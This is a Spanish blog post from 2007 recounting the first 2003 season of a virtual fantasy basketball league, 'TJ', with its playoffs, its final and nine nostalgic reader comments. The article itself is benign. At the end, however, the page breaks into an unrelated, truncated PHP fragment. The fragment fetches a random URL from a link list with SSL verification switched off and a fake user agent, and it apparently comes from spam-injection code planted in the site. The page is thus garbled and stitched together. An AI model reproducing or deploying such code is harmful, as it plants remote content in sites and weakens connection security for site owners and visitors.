VFL: Historia (I)

18 de December de 2007 por Jose_Dantley

28 de octubre de 2003. Tras varios meses de preparación, por fin comenzaba la locura de las box scores. Esa noche, Tim Duncan hacía 37 de eficiencia para los San Antonio Spurs de la NBA y para los Titoro de la TJ. Ese día se iniciaba la primera temporada de la TJ. Hoy nos encontramos en la quinta temporada de una de las pocas ligas virtuales de baloncesto que han sido capaces de superar la prueba del tiempo. Para todos aquellos que deseen conocer un poco más de la TJ, comenzamos una narración que nos va a llevar desde aquellos días del 2003 hasta el momento presente.

La liga se iba a poner en marcha no sin una ardua labor de elecciones de draft (aún disponibles aquí), composición de parejas, interminables discusiones sobre posiciones de los jugadores, creación de normas que incluían sextos hombres, gatos y demás fauna variopinta que realmente nunca se ha conseguido completar, pero que nos permitió que ese primer gran día llegara y que más de cuatro años después continuemos con una de las más grandes ligas virtuales que existen.

Primera temporada

En la primera temporada se disputaron 16 partidos de liga regular cada uno con una semana completa de duración. En los siguientes años, las jornadas se acortarían de manera que la liga regular se extendió a 28 partidos. Los equipos se dividían entonces y se dividen aún en dos Conferencias, nominadas en honor a dos grandes de las noches NBA, Antoni Daimiel y Andrés Montes. En cada conferencia, los cuatro primeros equipos pasan a playoffs. La gran final se disputa entre los campeones de conferencia.

La liga regular de la primera temporada TJ fue muy igualada. Finalmente vencieron los Vito Corleone Jugones con un balance de 12-4. Los Vito Corleone estaban dirigidos por una de las parejas que se mantiene todavía en nuestros días, Brolin (aka El Padrino) y Pedro (aka El Jugón). El equipo siciliano se ha caracterizado desde sus comienzos por ser un equipo muy estable poco dado a realizar traspasos. Yao Ming ha sido su estrella desde la primera temporada y continúa siendo el centro del equipo, con el incombustible Grant Hill como líder espiritual.

Desgraciadamente para los Vito, ser líder en la liga regular, al igual que ocurre en la NBA, no asegura más que una ventaja de campo que se puede esfumar en un solo partido. Los sicilianos iniciaron magníficamente los playoffs eliminando 2-0 a los Cencerro Queens. El resto de las eliminatorias fueron a 3 partidos con Dirkffindor derrotando a Soprano Playmakers gracias al factor cancha, La Extraña Pareja derrotando a The Engineers y, finalmente, Phoenix Suns venciendo a The Others.

Sin embargo, los Dirkffindor se iban a cruzar en el camino de los Vito para en un 2-0 con resultados muy ajustados proclamarse campeones de la conferencia Daimiel. Su rival, La Extraña Pareja necesitó del tercer partido para derrotar a Phoenix Suns.

La primera final de la TJ estaba servida, Dirkffindor La Extraña Pareja. La Extraña Pareja es uno de los pocos equipos cuyos propietarios abandonaron la TJ. El equipo fue retomado posteriormente por otros dueños que le tratan de devolver la gloria de los primeros días. Por el contrario, Dirkffindor es el equipo más laureado en la liga TJ en estos momentos. Sus GM, Frank y Viva_Shaq sentaron cátedra desde el primer año. Su franquicia se construyó sobre la base de Dirk Nowitzki, de donde toman parte del nombre. Es una franquicia especialmente dinámica en cuanto a trades y movimientos de agentes libres. Hoy día vive horas bajas que no pueden empañar la gran historia de este club.

Dirkffindor partía con ventaja de campo. En el primer partido, marcaron el territorio. 163 puntos en una final eran entonces una marca de gran valor. Su estrella, Nowitzki aportó 38 de esos puntos con Boozer como escudero con 33. Garnett hacía lo que podía en La Extraña Pareja realizando un, habitual para él, 34.3. El segundo partido fue mucho más igualado; Garnett con 37.7 decidió que debería haber tercer partido. En el tercer partido, nuevamente en cancha alemana, la victoria de Dirkffindor fue clara, 146-122. Como muestra de la capacidad de Viva y Frank de sacar puntos de donde parece imposible, el mejor del partido fue Sura con 24.5, seguido de Chris Crawford con 22.5. La primera TJ tenía dueño, los Dirkffindor.

Comenta

9 comentarios a esta entrada

  1. telekoman dice:
    #1

    Y yo me lo perdí. Como me hubiese gustado estar en esos inicios, igual que estuve en los de la TJ2. En fin, por lo menos ahora puedo jactarme de estar en las dos ligas virtuales más importantes del mundo NBA.

      Citar

  2. Viva_Dirk dice:
    #2

    Joder, que grande!!!!!

    Fue duro aquel anillo, con las bajas de Murphy y Harpring durante todo el año, afortunadamente el artista de mi compañero sacó a Bob Sura y Chris Crawford de la nada. De aquel equipo, el único que lleva con nosotros todo este tiempo de Nowitzki.

      Citar

  3. Noelinho dice:
    #3

    Que rabia me da no haber estado en aquellos inicios. Pero como dice teleko, cada vez que leo más cosas e historias de la liga, mesiento más orgulloso de pertenecer a esta familia 🙂

      Citar

  4. Hynreck dice:
    #4

    Si, que tiempos.
    Recuerdo que Duncan fue un regalo de bodas que le hicimos todos al buenazo de Tito, que por aquel entonces se casó y decidimos compensarle con el Nº1 del draft eh? 😛

      Citar

  5. Hynreck dice:
    #5

    Ayy ese Malone haciendo triples dobles…. se lesionó y ahi empezó la leyenda de la maldición del 4 de los Playmakers…

      Citar

  6. Pow_Brolin dice:
    #6

    Que tiempos aquellos … aun se recuerda en sicilia la suspension de Zach (marcandose sendos 0) y la Lesion inoportuna de Kidd (desde aquellos sucesos persona non grata en la isla) en la final de conferencia contra los Dirk ¬_¬!

    Repasando la plantilla y para que luego digan solo conservamos 3 jugadores Yao, Zach y el gran capitan Hill.

      Citar

  7. Dantley dice:
    #7

    La primera fue la más igualada creo yo. Perfectamente había 6 o 7 equipos candidatos. Los Dirkffindor se movieron mejor diría yo y también la verdad es que los Vito tuvieron mala suerte.

    Por cierto, ¿qué será de Juanjo?

    ¿Habéis visto el anuncio ese en el que la gente cuelga los regalos de navidad en Internet? Lo mismo que hizo Tito con su regalo de boda, jo, jo, lo acabó vendiendo. Buen apunte Hynreck

      Citar

  8. MagicJohnson32 dice:
    #8

    A mí se me ocurrió regalarle el nº 1 por su boda, y a mí (y a mi socio) me lo traspasó, jaja.

    Aunque ya lo dijimos aquel mismo día: con aquel traspaso no perseguíamos a Duncan (que ni debutó con nosotros); con aquel traspaso lo que queríamos y lo que conseguimos fue a ¡¡Bynum!!

    Grande aquella primera final. Sura y Crawford, jojojo, retirados los dos. Tremendo.

      Citar

  9. arivas dice:
    #9

    Ostras, me habéis obligado a repasar las hojas y joder, qué raras son!!!! Fondo blanco, lo del OK con las posiciones… jojo, tremendo.

    A nosotros nos fastidió el traspaso de Rahim a Portalnd, bueno eso y el equipazo de los Suns.

    Tremendo lo de las elecciones

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>